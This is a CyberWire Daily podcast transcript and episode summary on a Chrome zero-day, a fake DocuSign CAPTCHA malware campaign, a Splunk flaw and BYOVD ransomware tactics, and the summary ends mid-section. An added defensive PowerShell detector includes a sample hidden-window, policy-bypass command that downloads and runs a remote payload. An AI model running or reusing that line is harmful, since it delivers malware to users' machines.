Dave Bittner
You're listening to the Cyberwire network, powered by N2K.
Dave Bittner
And now a word from our sponsor, SpyCloud. Identity is the new battleground, and attackers are exploiting stolen identities to infiltrate your organization. Traditional defenses can't keep up. SpyCloud's holistic identity threat protection helps security teams uncover and automatically remediate hidden exposures across your users, from breaches, malware and phishing, to neutralize identity-based threats like account takeover, fraud and ransomware. Don't let invisible threats compromise your business. Get your free corporate darknet exposure report at spycloud.com/cyberwire and see what attackers already know. That's spycloud.com/cyberwire.

Google issues an emergency patch for a Chrome zero-day. A new malware campaign uses fake DocuSign CAPTCHA pages to trick users into installing a RAT. A high-severity Splunk vulnerability allows non-admin users to access and modify critical directories. Experts warn Congress that Chinese infiltrations are preparations for war. Senators look to strengthen cybersecurity collaboration in the US energy sector. Crocodilus Android malware adds fake contacts to victims' phones. SentinelOne publishes a detailed analysis of their recent outage. Cartier leaves some of its cyber sparkle exposed. Our guest is John Miller, CEO and co-founder of Halcyon, discussing bring-your-own-vulnerable-driver attacks. And Microsoft and CrowdStrike tackle hacker naming, or do they?

It's Tuesday, June 3rd, 2025. I'm Dave Bittner, and this is your CyberWire Intel Briefing.

Thanks for joining us here today. It's great to have you with us. Google has issued an emergency update to patch a Chrome zero-day, the third such vulnerability in Chrome exploited in the wild this year. The flaw, found in Chrome's V8 JavaScript engine, allows out-of-bounds memory access and was discovered by Google's Threat Analysis Group. A mitigation was applied within a day, and the full fix is included in recent versions for Windows, Mac and Linux. Google is withholding full details of the exploit until more users apply the patch. Earlier in 2025, Chrome zero-days were used in espionage and account hijacking campaigns. Last year, Google patched 10 exploited or demoed Chrome zero-days.

A new malware campaign is using fake DocuSign CAPTCHA pages to trick users into installing the NetSupport remote access trojan, according to DomainTools. The attack begins with a spoofed website that mimics DocuSign branding. Users are prompted to check a box, which triggers clipboard poisoning. A malicious PowerShell script is copied to the clipboard with instructions to run it manually. If executed, the script downloads further payloads, sets up persistence via GitHub-hosted malware, and ultimately installs NetSupport RAT for remote control. The campaign uses familiar tools and layered tactics like ROT13 encoding and script chaining to evade detection. Domains mimicking Okta, Netflix and Spotify were also used. DomainTools warns users to be cautious of sites prompting script execution and to inspect URLs and certificates carefully to avoid deception-based threats.

A high-severity vulnerability in Splunk Universal Forwarder for Windows allows non-admin users to access and modify critical directories due to incorrect permission settings during installation or upgrades. With a CVSS score of 8, this flaw affects multiple versions, posing significant risks to organizations that rely on Splunk for log forwarding and security. The bug enables potential exposure or manipulation of log data, which could lead to data breaches or tampered audit trails. Splunk urges immediate upgrades to patched versions. For those unable to upgrade, a mitigation is available to strip vulnerable permissions. This fix must be applied after any install, upgrade or reinstall to prevent unauthorized access and maintain security integrity.

Retired Lt. Gen. H.R. McMaster warned lawmakers that China's deep infiltration into U.S. telecommunications and critical infrastructure is part of a broader war preparation strategy. Speaking at a House Homeland Security Committee field hearing, McMaster linked recent cyber campaigns like Volt Typhoon to China's growing military ambitions, including a 44-fold defense budget increase and a possible first-strike nuclear capability. He also cited Chinese surveillance balloons aimed at U.S. strategic communications. Palo Alto Networks' Wendi Whitmore echoed concerns, noting that China, alongside Russia, Iran and North Korea, is becoming more aggressive in cyberspace. Palo Alto blocks up to 31 billion attacks daily, including millions of new threats. Whitmore stressed the need for faster two-way public-private collaboration and supported legislation to strengthen the Joint Cyber Defense Collaborative.

The FCC has issued a proposed rule that would expand ownership reporting requirements for nearly all entities it regulates, aiming to identify control by foreign adversaries. The rule would affect companies not currently required to report ownership, including private radio license holders and video service providers. Entities must disclose if they are controlled by foreign adversaries like China, Russia, Iran or North Korea, including if such parties hold 10% or more in voting or equity interest. Failure to comply could result in fines or license revocation. If foreign control is reported, detailed ownership disclosures would be made public and could trigger national security reviews. The FCC is also considering requiring updates or periodic reporting, with final rules likely to take effect by 2026.

Senators Jim Risch, Republican from Idaho, and John Hickenlooper, Democrat from Colorado, have introduced the Energy Threat Analysis Program Act to strengthen cybersecurity collaborations in the US energy sector. The bill would formalize the Department of Energy's Energy Threat Analysis Center as a central hub for cyber threat intelligence, coordinating efforts between the DOE, CISA, intelligence agencies and private energy operators. The goal is to improve early warnings and threat mitigation in response to increasingly complex cyber attacks. The legislation comes amid growing concern over fragmented threat reporting and critical infrastructure vulnerabilities, highlighted by a recent blackout in Spain and Portugal. Both senators emphasize the need for a resilient energy grid and improved data sharing to safeguard national security.

The latest version of the Crocodilus Android malware introduces a new feature that adds fake contacts to victims' phones, allowing attackers to spoof calls from trusted sources like banks or friends. First observed in Turkey in early 2025, Crocodilus has since expanded globally, now targeting victims on every continent alongside enhanced social engineering. Recent updates also include stronger evasion techniques such as code packing and local data parsing. Researchers warn Crocodilus is evolving fast and urge users to download apps only from trusted sources.

SentinelOne has published a detailed analysis of the global outage that impacted its services on May 29, attributing it to a flaw in a legacy infrastructure control system. The disruption, lasting about 20 hours, affected access to the SentinelOne management console but did not compromise endpoint protection or customer data. The incident began when a new account triggered faulty configuration logic, erasing critical DNS and network routes. SentinelOne has since taken steps to prevent recurrence, including accelerating its move to a new infrastructure-as-code architecture, backing up transit gateway settings, and enhancing automated recovery and customer communication protocols. Notably, GovCloud customers were unaffected due to infrastructure segregation.

Tomasz Szabo, a 26-year-old Romanian citizen, pleaded guilty to conspiracy and making bomb threats as part of a swatting campaign targeting about 100 individuals, including a former US president and members of Congress. The plot involved false emergency calls to provoke aggressive police responses. Szabo, extradited last year, acted with Serbian co-defendant Nemanja Radovanovic, who faces pending charges. The indictment describes politically neutral targeting and includes a January 2024 hoax involving a fake murder and bomb threat at a former official's home.

Cartier, the luxury brand known for diamond-studded discretion, has disclosed a data breach that left some of its sparkle exposed. In a politely worded note, Cartier admitted that an unauthorized party briefly wandered through its systems, collecting names, emails and countries of residence, and presumably not for a holiday card list. The company assures customers it's now added extra polish to its cybersecurity, but advises staying wary of any mysterious messages. Fashionably late to the breach club, Cartier joins Dior and Tiffany in May's cyber soiree. Here's the thing to do: spend a grand or two at Cartier.

Coming up after the break, my conversation with John Miller from Halcyon. We're discussing bring-your-own-vulnerable-driver attacks. And Microsoft and CrowdStrike tackle hacker naming, or do they? Stick around.
Maria Varmazis
Compliance regulations, third-party risk and customer security demands are all growing and changing fast. Is your manual GRC program actually slowing you down? If you've ever found yourself drowning in spreadsheets, chasing down screenshots or wrangling manual processes just to keep your GRC program on track, you're not alone. But let's be clear, there is a better way. Vanta's trust management platform takes the headache out of governance, risk and compliance. It automates the essentials, from internal and third-party risk to consumer trust, making your security posture stronger. Yes, even helping to drive revenue. And this isn't just nice to have. According to a recent analysis from IDC, teams using Vanta saw a 129% boost in productivity. That's not a typo, that's real impact. So if you're ready to trade in chaos for clarity, check out Vanta and bring some serious efficiency to your GRC game. Vanta GRC: how much easier trust can be. Get started at vanta.com/cyber.
Dave Bittner
John Miller is CEO and co-founder of Halcyon. I recently caught up with him at the RSAC conference for this sponsored conversation about bring-your-own-vulnerable-driver attacks.
Dave Bittner
We are continuing our conversations here at RSAC 2025, and joining me here is John Miller. He is the CEO and founder of Halcyon. John, welcome.
John Miller
Thank you. Thanks for having me.
Dave Bittner
So before we dig into our topics here, for folks who may not be familiar with the company, give us the brief description of what Halcyon does.
John Miller
So Halcyon is the first focused anti-ransomware company. So I came up with the idea that even though we're in the most sophisticated state of cybersecurity ever, the ransomware groups keep getting more ground, right?
Dave Bittner
Yeah.
John Miller
And so my theory was it's because everyone's too generalized, right? If you look at an endpoint, if you look at a network technology, they have to stop everything, everything in the MITRE ATT&CK framework. And my thought process was, if we focused on ransomware, took apart what they were doing and tailor-built an obstacle for them, their techniques, their tools, we could be more effective.
Dave Bittner
Right.
John Miller
So essentially, take a look at the edges of the security landscape where there are cracks that the attackers are exploiting. And instead of trying to build something that's at parity with what already exists, just focus on those cracks.
Dave Bittner
Right.
John Miller
Coming in with another layer, make sure the data doesn't get exfiltrated, make sure that they can't lateralize through an environment, and make sure that if they can affect availability of data, we can always recover it at a speed that's so quick, it's not a big deal anymore.
Dave Bittner
Right.
John Miller
I like to tell customers that if a ransomware attack's successful and it just affects a single host and the data doesn't leave that host, and the data that gets encrypted on that host is back in like an hour, is it a big deal? And the answer is always, no, it's not. We can deal with one computer being down, it's all of them being down that turns into a big problem. So we tried to focus on that value prop, not necessarily protecting everything, but being resilient against an attack where if they're successful, you can evict them out and make sure that they never get enough leverage to make somebody pay them.
Dave Bittner
Well, I mean, help me understand your approach to that problem. How much of it is looking at the individual ransomware groups and the tactics, techniques, and procedures that they use, versus looking at the menu of potential weaknesses that the users have?
John Miller
It's all ransomware groups. Okay, right. So that's where we've really differentiated it. I like to call it attacker-led growth, right? There are, you know, 300, 350 different ransomware groups. And when you look at their tools and tactics and, you know, procedures, they're much more similar than they are dissimilar.
Dave Bittner
Right.
John Miller
So the whole thought was it's not like defending against an APT, where they have a goal and they will do whatever it takes to get that goal. Ransomware is a business. They're all about ROI. So if you watch what they're doing and build the biggest obstacle for that, you break them. They get to a point where they're expending so much effort, they're not gaining ground. They literally just pack up and leave, right? And that's what it's all about: exploiting the weaknesses of the fact that ransomware is a business. And because of that, you can come at them with business obstacles and break it.
Dave Bittner
As you look at the trending lines of ransomware, you know, the evolution of it, in my mind, you know, we're seeing less and less encryption and more double extortion. Is that an accurate perception?
John Miller
So I wouldn't say less and less.
Dave Bittner
Okay, right.
John Miller
What we found over the last couple years are people are more reserved in paying them. Everybody understands if you pay these guys, it keeps them going.
Dave Bittner
Right.
John Miller
So everyone, you know, is trying to get backups, do their own recovery. And what they found is, yeah, that double extortion piece of exfiltrating those files and threatening to leak them gets people to pay. There are definitely groups now where that's all they do. They don't do the lockup at all, but the lockups are still happening. And then what we're starting to see, and you're going to love this: so you add the encryption, the single extortion, then you add the data, double extortion. Triple extortion comes next, right? Which is... So think about this.
Dave Bittner
Go on.
John Miller
And what's left?
Dave Bittner
What's left to extort? The actual information.
Dave Bittner
Right.
John Miller
So in double extortion, they have the information. They say, if you don't give me money, I'm going to leak it, right? Triple extortion is, I'm going to read the data and make money off of that.
Dave Bittner
Right.
John Miller
So imagine they compromise a giant corporation.
Dave Bittner
Yeah.
John Miller
And this is... Everyone loves talking about AI at RSA. What happens when you can take an entire company's email spool and have an LLM read every email and then answer your questions?
Dave Bittner
Right.
John Miller
All the chat logs. We're now at a point where there was so much data that they couldn't really make use of it.
Dave Bittner
Right.
John Miller
You're looking for a needle in a haystack, but with AI, it's like, go through every piece of hay and separate out all the needles. So I think you're going to see more and more of, you know, more attackers, more aggressive attacks, and then them trying to figure out what they can do to essentially increase the pain.
Dave Bittner
Right.
John Miller
How do I get more leverage if you're not paying now? How can I make it more painful to make sure that you pay?
Dave Bittner
There's a term that you shared with me that I want to be sure we touch on. And it's bring your own vulnerable driver, BYOVD. Explain that for us. Unpack that.
John Miller
All right, so before I unpack that, I saw a LinkedIn post this morning.
Dave Bittner
Yeah.
John Miller
And somebody's been going around RSA graffiti tagging, right? And it was funny because 10 years ago there was this whole, like, AV is dead, right? Do you remember that? Yeah, I think it was one of the Symantec execs came out. He was like, AV is dead. And then everyone jumped on it. What they're tagging is EDR is easily bypassable, and bring-your-own-vulnerable-driver attacks are the easiest, most common way for EDR to be bypassed in a ransomware attack today, as well as APT attacks. And so what bring your own vulnerable driver is, is the attackers have figured out: instead of going out and finding a zero-day and writing an exploit, I can take an old Windows driver that's still signed and valid and in the Windows catalog, where someone's already found a vulnerability, they've already published PoC code. The manufacturer responded, they came out with a new version. But the problem is you can still load that old version.
Dave Bittner
Right.
John Miller
They don't block it because if they blocked it, people that hadn't upgraded yet, it'd kill them. So what they do is, when an attacker gets in, they'll actually bring a vulnerable driver with them. If there's one not present, they'll then load that up into the system, exploit it to get kernel privileges, and then disable the EDR.
Dave Bittner
Right.
John Miller
And it's something that the EDR can't really protect against. It's a problem with Windows that architecturally can't really be solved, because nobody updates everything in real time.
Dave Bittner
Right. Right.
John Miller
And so we were the first company to come out with... How do we... What are the best ways to protect the EDR?
Dave Bittner
Right.
John Miller
CrowdStrike's amazing product. It's very expensive.
Dave Bittner
Yeah.
John Miller
How do you make sure that it's on, delivering that protection in an attack when you actually need it? And so we rolled out what we called sidekick protections, like Batman and Robin. George Kurtz is Batman. I'm Robin.
Dave Bittner
Young ward.
John Miller
Yeah, I'm the young ward. And it's not just CrowdStrike, it's Defender. It's Palo Alto and SentinelOne.
Dave Bittner
Right.
John Miller
But actually watching for the signals of these attackers coming in and attacking the EDR to convict them and shut them down, or, if they get all of the way to actually terminating the process, be the one that's sitting there watching it, being like, CrowdStrike just got disabled. Something bad's going on.
Dave Bittner
Right.
John Miller
Where that level of signal hasn't existed yet.
Dave Bittner
Right.
John Miller
It's very much following what the attackers are doing and trying to figure out the best way and very focused features to really defeat kind of that 80%. I always joke with my team that we have like 10 different layers of protection and we shot for 80%. And I'm like, 10 layers, 80%, that's 800% efficacy. I can live with that.
Dave Bittner
Right.
John Miller
But it very much... I was at a talk last night, and George Kurtz was talking about the crash, the unpleasantness.
Dave Bittner
Right.
John Miller
And he was like, it was a Swiss cheese problem, where there are always holes. And he was like, there was the one time where all the layers went together. You could see all the way through. Right, right. So it's, how do you come in with those multiple layers where even if somebody's going to get through, you know, on the other side there's a layer, on the other side there's a layer, so on and so on. It's all about defense in depth.
Dave Bittner
Well, so help me understand, you know, as a comparatively non-technical person, how does it work? Are you looking at behavioral things? How do you make sure all of it?
Dave Bittner
Yeah.
John Miller
So the best way to think about us is we fill this spot between where an EDR ends and you have to go to backups, to recovery.
Dave Bittner
Right. Okay.
John Miller
So after an antivirus, or EDR, whatever, takes a look at something and says, this is good, let it run, we come in behind them and we take a second look. So we have a pre-execution engine that, this is going to sound crazy, runs on machine learning models. They're just trained on ransomware. Nobody else has done that for some reason. So it goes to run, we take a look at it and say, do we think this is ransomware? If we think it's ransomware, we kill it.
Dave Bittner
Right.
John Miller
If we're not sure, we'll let it run. And then we have a behavioral engine. And what we do behaviorally is we look for data exfiltration and stop it. We look for them attacking the EDR, we look for them tampering with backups. And then we look for the actual ransomware encryption behavior. They start encrypting files and deleting stuff. And so if it gets that far, we'll actually stop the encryption. What really makes us unique is when that encryption starts to run, we capture and copy the keys, we tokenize them and we cache them. We don't know if they're good or bad yet, but we know they could be. So let's hold onto it for a little bit. And if it's ransomware, we'll stop it. There's a stage that comes in where there's an attacker on your network on that host with admin credentials. So we come in, we have a team called Rise. It's a 24 by 7 SOC, and in real time, right within 60 seconds, they'll start evicting that attacker. They'll start looking at what account is it using, how did it get there, push them out, and then at the same time recover that endpoint. So we always say within minutes of getting the attacker out of the network, everything's restored. If something was encrypted, it's decrypted. It makes networks the most theoretically resilient we can come up with to a ransomware attack.
Dave Bittner
Where do you suppose we're headed with ransomware? Like, what's next?
John Miller
Not to a good location, I'll tell you that. The barrier to entry to ransomware is really low.
Dave Bittner
Right, right.
John Miller
You said that you're not a technical guy. I could teach you how to be a ransomware guy in two hours.
Dave Bittner
My retirement plan, John.
John Miller
So I don't know if this is a good thing to say. Belize has no computer crimes laws.
Dave Bittner
Right.
John Miller
So if you want to retire down to Belize, they speak English there, run a ransomware empire, just focus on hacking Russian companies, and I think everyone will be okay with it.
Dave Bittner
Yeah, I mean, I'm being flippant about it, but I think that's a really important point, is that the barrier to entry is practically zero.
John Miller
And it keeps getting easier and easier and easier.
Dave Bittner
Yeah.
John Miller
And so what we're seeing is the actual attackers are growing. We're getting more people that are willing to do this because, well, you're not... You might not be willing to be a hacker to go hack someone for a thousand bucks. For $20 million?
Dave Bittner
Right.
John Miller
Like, and if your sophistication is admin level, you can crush it. And there's no real. I mean, the FBI is doing a great job, but the problem is the majority of these people are in Russia and there's very little they can do there.
Dave Bittner
Right.
John Miller
So you've got all of these threat actors coming online in countries where they normally didn't have offensive cyber stuff going on before, and then on top of it, I hate to say it, but critical infrastructure: the Colonial Pipeline attack proved that you can attack American critical infrastructure, you can get paid for it, and you can get away with it.
Dave Bittner
Right?
John Miller
So now we have, like, you can do whatever you want. Everyone that wants to do it can do it. It's super easy. You're going to get money and nobody's going to try to arrest you. It's full on a recipe for disaster.
Dave Bittner
Right.
John Miller
I always used to say that security is only limited by the amount of people that have the skill and the motivation to do it, right? Like, a great example was when Heartbleed came out years and years ago. It wasn't like the Internet broke. And I'm like, it's not that a thousand new attackers came online that day to exploit that vulnerability. And what we're seeing now is just an above-linear rise in the actual people that are willing to do this and have the capabilities to. And then on top of it, the sophistication of these attacks is going over kind of nation-state levels now, where nation states have rules: there are things they're allowed to do, there are things that they aren't allowed to do. Criminals have no rules, right? They get to do whatever works best. And yeah, I think the next five to 10 years are going to be not great.
Dave Bittner
That's John Miller, CEO and co-founder of Halcyon. And finally, one of the challenges of having this particular job that this podcast host has is keeping track of all of the names of different threat actors. You've got your Cozy Bears, you've got your Volt Typhoons, you've got your Salt Typhoons. Everybody has different names for things. Well, we've been seeing a lot of coverage of a collaboration between Microsoft, CrowdStrike, Google's Mandiant and Palo Alto Networks to join forces to try to clean up this messy, confusing world of hacker group names. Joining me here is Maria Varmazis from the T-Minus Space Daily podcast and also a colleague here at N2K. Maria, welcome. Hi.
Maria Varmazis
Thanks, Dave.
Dave Bittner
So let's dig in here. When you saw this news come across, what was your initial thought here?
Maria Varmazis
Well, the very first thing, honestly, was the XKCD comic about there are 14 competing standards, and now everyone agrees that there needs to be a new standard that covers everyone's cases, and the update is, now there are 15 competing standards. So I feel like I should just paste that comic on my wall because it applies so often. It feels like a good move. I mean, it's a noble thing that they're trying to achieve, and certainly they're huge players in the space, so maybe everyone will follow their lead. I'm sure that's their hope. But I have some concerns about how this will actually work.
Dave Bittner
Well, there's been a little confusion. I've seen some reporting interpreting this that all these groups are going to adopt Microsoft's naming conventions and Microsoft uses different types of weather for different groups. But that doesn't seem to be the case. When you look at how CrowdStrike is describing this and some of the other folks, it seems as though this is just going to be a Rosetta Stone where everyone gets to keep their own names, but we have a handy spreadsheet to cross reference.
Maria Varmazis
And good luck, everybody. And good luck to whoever has to maintain that. That's gonna be such a nightmare going forward, let alone just at the starting point. So it's. Again, I just. I have so many questions about how this is gonna work.
Dave Bittner
Well, as our CyberWire editor here pointed out, Tim Nodar said that MITRE has been doing this. There's an online source called Malpedia that...
Maria Varmazis
Does this, so why not use that? I don't understand. Why do we have to make a new competing standard? I don't get it.
Dave Bittner
Yeah, yeah. Again, I think coming from a position of good faith and trying to address something that everybody recognizes is a problem. But is this a step forward? I don't know.
Maria Varmazis
Time will tell, Dave. Time will tell.
Dave Bittner
I guess I'm stuck between wanting to be supportive of everyone's good faith efforts here, but left scratching my head as to how this is actually going to change anything and be particularly helpful.
Maria Varmazis
We'll see. I mean, I'm just. Yeah, I'm just feeling a bit of preemptive pity for the person who has to maintain this moving forward to keep track of all the different group names that everyone's gonna be using. Because if it's not, just they're not coming in and saying, this is the law, everybody. Because good luck with that. Honestly. Yeah, this is what we're calling it. Everybody else, shut up. No. You know that people are going to want to put their own stamp on things. Different groups are going to want to name things their way and. What a mess.
Dave Bittner
Well, let me just close out by saying and suggesting to all of these organizations who are going at this, if you really want to help, and this is a selfish request, include phonetic pronunciation guides for all of these. Yes, please. Because as the people who often have to decide how these things are pronounced, you know, is it Kakbot or is it Quackbot? I don't know.
Maria Varmazis
And you put a Q without a U. How are we supposed to figure this out?
Dave Bittner
Yeah, right, exactly. And all the leet speak stuff and all that kind of stuff. So if you want to add something to these that could be helpful to those of us who have the responsibility of actually saying these names out loud, include phonetic pronunciation guides. We will be forever grateful, and we will forgive you for the redundancy that this new standard seems to be introducing to the ecosystem. All right, Maria, thank you so much for joining us. As they say, time will tell.

And that's the CyberWire. For links to all of today's stories, check out our daily briefing at thecyberwire.com. We'd love to hear from you. We're conducting our annual audience survey to learn more about our listeners. We're collecting your insights through the end of August this year. There's a link in the show notes. Please do check it out. N2K's senior producer is Alice Carruth. Our CyberWire producer is Liz Stokes. We're mixed by Trey Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher. And I'm Dave Bittner. Thanks for listening. We'll see you back here tomorrow.

Hey, everybody, Dave here. I've talked about DeleteMe before, and I'm still using it because it still works. It's been a few months now, and I'm just as impressed today as I was when I signed up. DeleteMe keeps finding and removing my personal information from data broker sites, and they keep me updated with detailed reports so I know exactly what's been taken down. I'm genuinely relieved knowing my privacy isn't something I have to worry about every day. The DeleteMe team handles everything. It's the set-it-and-forget-it peace of mind. And it's not just for individuals. DeleteMe also offers solutions for businesses, helping companies protect their employees' personal information and reduce exposure to social engineering and phishing threats. And right now, our listeners get a special deal: 20% off your DeleteMe plan. Just go to JoinDeleteMe.com/N2K and use promo code N2K at checkout. That's JoinDeleteMe.com/N2K, code N2K.
CyberWire Daily: Zero-day Déjà Vu
Hosted by N2K Networks
Release Date: June 3, 2025
In today’s episode of CyberWire Daily, hosted by Dave Bittner from N2K Networks, listeners are treated to an in-depth analysis of the latest cybersecurity threats, vulnerabilities, and industry responses. The episode, titled "Zero-day Déjà Vu," covers critical security patches, emerging malware campaigns, geopolitical cyber threats, regulatory developments, and insightful interviews with industry leaders.
Google Chrome Emergency Patch
At the outset, Dave Bittner discusses a critical update from Google addressing a zero-day vulnerability in Chrome's JavaScript engine.
Summary:
Google has released an emergency patch for a zero-day vulnerability in Chrome's V8 JavaScript engine. The flaw allows out-of-bounds memory access and is the third Chrome zero-day exploited in the wild this year; earlier ones were used for espionage and account hijacking. Google's Threat Analysis Group identified the vulnerability, and a mitigation was deployed within a day. The comprehensive fix is now available in the latest versions for Windows, Mac, and Linux. To safeguard users, Google is withholding full exploit details until the majority apply the patch.
Notable Quote:
“Google is withholding full details of the exploit until more users apply the patch.”
— Dave Bittner [00:12]
Fake DocuSign CAPTCHA to Deploy RATs
A sophisticated malware campaign is leveraging fake DocuSign CAPTCHA pages to deceive users into installing the NetSupport Remote Access Trojan (RAT).
Details:
According to DomainTools, attackers create spoofed websites mimicking DocuSign branding. Users are tricked into checking a box, which triggers clipboard poisoning: a malicious PowerShell script is copied to the clipboard, together with instructions to paste and run it manually. If executed, the script downloads additional payloads, establishes persistence through GitHub-hosted malware, and installs the NetSupport RAT, granting remote control over the victim's system. The campaign employs techniques like ROT13 encoding and script chaining to evade detection, with domains also imitating services like Okta, Netflix, and Spotify.
Advisory:
“DomainTools warns users to be cautious of sites prompting script execution and to inspect URLs and certificates carefully to avoid deception-based threats.”
— Dave Bittner [00:19]
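The lure described above leaves a recognisable trace on the endpoint: the user pastes a one-liner into the Run dialog or a console, so the resulting PowerShell process has an interactive parent and a command line that fetches or evaluates remote content. The following is an added example, not DomainTools' detection logic and not code from the episode, of a PowerShell scorer that applies that heuristic to process-creation records. The records are constructed to resemble Sysmon Event ID 1 fields (Image, ParentImage, CommandLine); the GitHub path in the first sample is a placeholder.

```powershell
# Added example (constructed records, not DomainTools' detection logic): score
# process-creation events for the pattern a clipboard-paste lure produces, an
# interactive parent (explorer.exe) launching a scripting host whose command
# line fetches or unwraps a second stage.

function Test-PasteLureExecution {
    [CmdletBinding()]
    param(
        # One record with Sysmon Event ID 1-style fields: Image, ParentImage, CommandLine.
        [Parameter(Mandatory, ValueFromPipeline)]
        [pscustomobject] $Record
    )
    process {
        $image  = [System.IO.Path]::GetFileName($Record.Image).ToLowerInvariant()
        $parent = [System.IO.Path]::GetFileName($Record.ParentImage).ToLowerInvariant()
        $cmd    = [string] $Record.CommandLine

        $reasons = [System.Collections.Generic.List[string]]::new()

        # Run-dialog and paste-into-console launches surface as explorer.exe children.
        if ($parent -eq 'explorer.exe' -and $image -in @('powershell.exe', 'pwsh.exe', 'cmd.exe', 'mshta.exe')) {
            $reasons.Add('interactive parent spawned a scripting host')
        }
        # Fetch-and-run primitives a pasted one-liner relies on (-match is case-insensitive).
        if ($cmd -match 'invoke-webrequest|\biwr\b|downloadstring|downloadfile|invoke-expression|\biex\b|start-bitstransfer') {
            $reasons.Add('command line fetches or evaluates remote content')
        }
        # Window hiding, policy bypass and encoded commands are not needed by interactive use.
        if ($cmd -match '-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)?\s+bypass|-enc(odedcommand)?\b') {
            $reasons.Add('hides the window, bypasses policy or passes an encoded command')
        }
        # The campaign on this page stages follow-on payloads from GitHub-hosted files.
        if ($cmd -match 'raw\.githubusercontent\.com|github\.com/[^/\s]+/[^/\s]+/raw') {
            $reasons.Add('pulls a payload from a GitHub-hosted raw file')
        }

        [pscustomobject]@{
            Image      = $image
            Parent     = $parent
            Score      = $reasons.Count
            Suspicious = ($reasons.Count -ge 2)   # one signal alone is too noisy to page on
            Reasons    = ($reasons -join '; ')
        }
    }
}

# Constructed sample records: the first imitates a pasted lure, the rest are benign.
$samples = @(
    [pscustomobject]@{
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = 'powershell -w hidden -ep bypass -c "iex (iwr https://raw.githubusercontent.com/PLACEHOLDER-ORG/PLACEHOLDER-REPO/main/stage.txt)"'
    },
    [pscustomobject]@{
        # Scheduled inventory script: service host parent, local file, no fetch primitives.
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentImage = 'C:\Windows\System32\svchost.exe'
        CommandLine = 'powershell.exe -File C:\scripts\inventory.ps1'
    },
    [pscustomobject]@{
        # An admin simply opening a console from the Start menu scores 1, not suspicious.
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = 'powershell.exe'
    }
)

$samples | Test-PasteLureExecution | Format-Table -AutoSize
```

Run against the constructed records, only the first one is marked Suspicious (score 4); the interactive console launch scores 1 and the scheduled task scores 0. The two-signal threshold is the design choice worth keeping when adapting this to real telemetry: an explorer.exe parent alone describes every console a user opens, and download cmdlets alone describe plenty of legitimate automation.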
High-Severity Flaw in Splunk
A significant vulnerability has been identified in Splunk Universal Forwarder for Windows, posing severe risks to organizations relying on Splunk for log forwarding and security.
Key Points:
The vulnerability allows non-admin users to modify critical directories due to improper permission settings during installation or upgrades. With a CVSS score of 8, this flaw affects multiple versions and can lead to data breaches or tampered audit trails. Splunk has urged immediate upgrades to patched versions and provided a mitigation to strip vulnerable permissions, emphasizing the necessity of these measures post-installation or upgrades to maintain security integrity.
Notable Quote:
“The bug enables potential exposure or manipulation of log data, which could lead to data breaches or tampered audit trails.”
— Dave Bittner [00:24]
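The Splunk issue above is a file-system permissions problem: directories under a security tool's install tree that a standard user can write to let that user tamper with binaries, configuration or the logs being forwarded. The following is an added example, not Splunk's own mitigation script and not code from the episode, of a PowerShell audit that walks a directory tree and reports every Allow ACE granting write-capable rights to low-privilege principals. $InstallRoot is a placeholder and must be set to the actual install directory; Splunk's advisory remains the source for the exact permissions to strip.

```powershell
# Added example (not Splunk's own remediation): report directories under a
# security tool's install tree where non-admin principals hold write-capable
# rights. $InstallRoot below is a placeholder; set it to the real install path.

function Find-WeakDirectoryAcl {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)]
        [string] $Path,

        # Principals that should never be able to change a log forwarder's
        # binaries, configuration or spooled data.
        [string[]] $LowPrivPrincipals = @(
            'BUILTIN\Users',
            'NT AUTHORITY\Authenticated Users',
            'NT AUTHORITY\INTERACTIVE',
            'Everyone'
        )
    )

    # Any of these rights lets a standard user alter, replace or delete files,
    # or rewrite the ACL itself.
    $writeMask = [System.Security.AccessControl.FileSystemRights] (
        'Write, Modify, FullControl, WriteData, AppendData, Delete, ' +
        'DeleteSubdirectoriesAndFiles, TakeOwnership, ChangePermissions'
    )

    # Audit the root itself plus every subdirectory.
    $dirs = @(Get-Item -LiteralPath $Path) +
            @(Get-ChildItem -LiteralPath $Path -Directory -Recurse -ErrorAction SilentlyContinue)

    foreach ($dir in $dirs) {
        $acl = Get-Acl -LiteralPath $dir.FullName
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
            if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.FileSystemRights -band [int]$writeMask) -eq 0) { continue }

            [pscustomobject]@{
                Path      = $dir.FullName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited   # inherited ACEs have to be fixed at the parent
            }
        }
    }
}

# Placeholder: replace with the forwarder's actual install directory.
$InstallRoot = 'C:\PLACEHOLDER\InstallRoot'

if (Test-Path -LiteralPath $InstallRoot) {
    $findings = @(Find-WeakDirectoryAcl -Path $InstallRoot)
    if ($findings.Count -eq 0) {
        Write-Host "No write-capable rights for low-privilege principals under $InstallRoot"
    } else {
        $findings | Format-Table -AutoSize
    }
} else {
    Write-Warning "Set `$InstallRoot to an existing directory before running the audit."
}
```

The Inherited column matters for remediation: an ACE inherited from the parent (for example, the default Users entry on Program Files subfolders created with inheritance enabled) reappears if you remove it on the child, so the fix belongs on the directory where the entry originates. Re-run the audit after every install or upgrade, since the flaw described above reintroduces the permissions at exactly those points.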
China’s Cyber Infiltration and Preparations for War
Retired Lt. Gen. H.R. McMaster has raised alarms about China’s deep infiltration into U.S. telecommunications and critical infrastructure, framing it as part of a broader strategy for potential warfare.
Insights:
During a House Homeland Security committee field hearing, McMaster linked cyber campaigns like Volt Typhoon to China’s expanding military capabilities, including a 44-fold increase in defense budget and the development of first-strike nuclear capabilities. He also referenced Chinese surveillance balloons targeting U.S. strategic communications.
Industry Perspective:
Wendi Whitmore from Palo Alto Networks echoed these concerns, highlighting that alongside nations like Russia, Iran, and North Korea, China is becoming increasingly aggressive in cyberspace. Palo Alto Networks reportedly blocks up to 31 billion attacks daily, emphasizing the need for enhanced public-private collaboration and supportive legislation to strengthen joint cyber defense efforts.
Notable Quote:
